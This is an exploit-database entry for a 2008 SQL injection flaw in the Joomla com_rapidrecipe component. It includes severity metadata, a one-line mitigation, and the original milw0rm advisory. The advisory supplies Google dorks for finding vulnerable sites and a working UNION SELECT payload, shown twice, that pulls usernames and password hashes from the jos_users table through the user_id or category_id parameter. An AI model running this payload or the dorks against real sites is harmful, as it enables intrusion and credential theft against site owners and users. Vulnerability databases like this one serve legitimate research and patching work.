header-logo
Suggest Exploit
vendor:
rapidrecipe
by:
S@BUN
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: rapidrecipe
Affected Version From: 1.6.2005
Affected Version To: 1.6.2005
Patch Exists: NO
Related CWE: N/A
CPE: a:konstantinos_kokkorogiannis:rapidrecipe
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Joomla SQL Injection (com_rapidrecipe)

An attacker can exploit this vulnerability by adding an exploit after the user_id or category_id parameter. The exploit is -9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries.
Source

Exploit-DB raw data:

#########################################################################
#
# joomla SQL Injection(com_rapidrecipe)
#
#########################################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.hackturkiye.com
#
# MAİL : hackturkiye.hackturkiye@gmail.com
#
#########################################################################
#
# DORK 1 : allinurl: "com_rapidrecipe"user_id
#
# DORK 2 : allinurl: "com_rapidrecipe" category_id
#
#########################################################################
EXPLOIT :

after user_id or catogry_id add exploit

-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*

#########################################################################
# S@BUN           i AM NOT HACKER              S@BUN
#########################################################################

<mosinstall type="component">
 <name>rapidrecipe</name>
 <creationDate>30/7/2007</creationDate>
 <author>Konstantinos Kokkorogiannis</author>
 <copyright>This component in released under the Chefs and Koyans License. You should not use it unless you have bought it.</copyright>
 <authorEmail>koyan@dianthos.net</authorEmail>

 <authorUrl>www.dianthos.net</authorUrl>
 <version>1.6.5</version>

# milw0rm.com [2008-02-12]